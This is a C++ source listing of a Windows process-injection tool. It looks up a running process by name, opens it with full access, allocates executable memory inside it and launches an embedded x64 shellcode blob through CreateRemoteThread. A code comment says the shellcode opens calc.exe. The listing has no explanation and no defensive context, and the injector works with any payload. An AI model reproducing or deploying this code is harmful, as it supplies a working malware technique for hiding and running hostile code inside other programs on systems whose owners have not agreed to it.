Inject shellcode into process

1. #include <stdio.h>
2. #include <windows.h>
3. #include <TlHelp32.h>
4. #include <iostream>
5. #include <string>
6.  
7. void inject(int pid) {
8.     // Try to open calc.exe
9.     unsigned char shellcode[] =
10.         "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
11.         "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
12.         "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
13.         "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
14.         "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
15.         "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
16.         "\x48\x83\xec\x20\x41\xff\xd6";
17.  
18.     HANDLE pidproc;
19.     PVOID memaddr;
20.     BOOL writescmem;
21.     SIZE_T written;
22.     HANDLE thrd;
23.  
24.     pidproc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
25.     if (pidproc) {
26.         printf("[+] PID opened\n");
27.     }
28.     else {
29.         printf("[-] PID not found\n");
30.         exit(1);
31.     }
32.  
33.     memaddr = VirtualAllocEx(pidproc, NULL, sizeof(shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
34.     if (memaddr) {
35.         printf("[+] Allocated virtual memory: 0x%08x\n", memaddr);
36.     }
37.  
38.     writescmem = WriteProcessMemory(pidproc, memaddr, shellcode, sizeof(shellcode), &written);
39.     if (writescmem) {
40.         printf("[+] Shellcode written to memory\n");
41.     }
42.  
43.     thrd = CreateRemoteThread(pidproc, NULL, 0, (LPTHREAD_START_ROUTINE)memaddr, NULL, 0x0, NULL);
44.     if (thrd) {
45.         printf("[+] Shellcode executed!\n");
46.     }
47.     CloseHandle(pidproc);
48. }
49.  
50. void help(const std::string& programName) {
51.     printf("usage: %s ProcessName\n", programName.c_str());
52. }
53.  
54. int GetProcessIdByName(const std::wstring& processName) {
55.     int processId = 0;
56.     HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
57.  
58.     if (hSnapshot != INVALID_HANDLE_VALUE) {
59.         PROCESSENTRY32 processEntry;
60.         processEntry.dwSize = sizeof(PROCESSENTRY32);
61.  
62.         if (Process32First(hSnapshot, &processEntry)) {
63.             do {
64.                 std::wstring entryName(processEntry.szExeFile);
65.  
66.                 if (_wcsicmp(entryName.c_str(), processName.c_str()) == 0) {
67.                     processId = static_cast<int>(processEntry.th32ProcessID);
68.                     break;
69.                 }
70.             } while (Process32Next(hSnapshot, &processEntry));
71.         }
72.  
73.         CloseHandle(hSnapshot);
74.     }
75.  
76.     return processId;
77. }
78.  
79. int main(int argc, char* argv[]) {
80.     if (argv[1] == NULL) {
81.         std::string fullPath(argv[0]);
82.         size_t lastSlashPos = fullPath.find_last_of("/\\");
83.  
84.         std::string programName;
85.  
86.         if (lastSlashPos != std::string::npos) {
87.             programName = fullPath.substr(lastSlashPos + 1);
88.         }
89.         else {
90.             programName = fullPath;
91.         }
92.         help(programName);
93.         return 0;
94.     }
95.  
96.     std::wstring targetProcessName = std::wstring(argv[1], argv[1] + strlen(argv[1]));
97.     int pid = GetProcessIdByName(targetProcessName);
98.  
99.     inject(pid);
100. }